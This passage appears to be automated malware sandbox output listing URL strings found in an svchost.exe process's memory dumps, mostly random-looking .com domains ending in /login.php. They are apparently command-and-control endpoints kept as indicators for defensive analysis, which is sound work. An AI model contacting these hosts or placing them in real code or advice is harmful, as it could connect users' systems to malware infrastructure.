Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynyj.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyser.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykysix.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004799359.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998684932.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2001263336.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykytej.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373519740.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369279850.00000000066A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvod.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvyx.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021195264.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006946749.00000000029D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyxur.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfyn.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjon.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylij.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymax.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020836236.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998698714.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023012112.000000000667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyner.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymynuj.com/
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085113371.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090604412.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymynuj.com/login.php
Source: svchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytux.com/http://lyvywed.com/
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567335310.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywad.com/login.php
Source: svchost.exe, 00000002.00000003.1897979252.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywaj.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywun.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyxex.com/login.php
Source: svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046143782.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfox.com/login.php
Source: svchost.exe, 00000002.00000003.2491008022.00000000066A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrygid.com/http://gatyniz.com/0
Source: svchost.exe, 00000002.00000003.2491008022.00000000066A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrygid.com/http://pufyjag.com/http://lyrygid.com/H
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095371512.0000000006721000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrygid.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1993850532.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1995203314.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryjir.com/login.php
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryler.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxytur.com/login.php
Source: svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2033528164.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2029714857.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036451216.00000000066BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/login.php
Source: svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/login.php4
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxox.com/login.php
Source: svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046143782.000000000B403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybop.com/login.php
Source: svchost.exe, 00000002.00000003.2564959910.00000000066A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564961073.00000000066A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufydaq.com/http://ganyzuz.com/http://pufydaq.com/H
Source: svchost.exe, 00000002.00000003.2564959910.00000000066A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564961073.00000000066A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufydaq.com/http://vopydaf.com/http://qekyqoq.com/0
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufydul.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygav.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021041342.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2016992308.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjuq.com/login.php
Source: svchost.exe, 00000002.00000003.2394184434.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460748465.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2441645467.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425878319.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524608844.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397913686.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423753303.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454863582.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446339089.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536917533.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2416226275.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181277.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450513652.00000000029BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylap.com/login.php
Source: svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085027687.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypeg.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1890971737.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypiq.com/login.php
Source: svchost.exe, 00000002.00000002.2587888808.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypuv.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyweq.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565639625.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589839623.0000000002946000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460730847.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575906953.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxov.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxug.com/login.php
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602250771.0000000006674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybev.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybig.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362751556.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycov.com/login.php
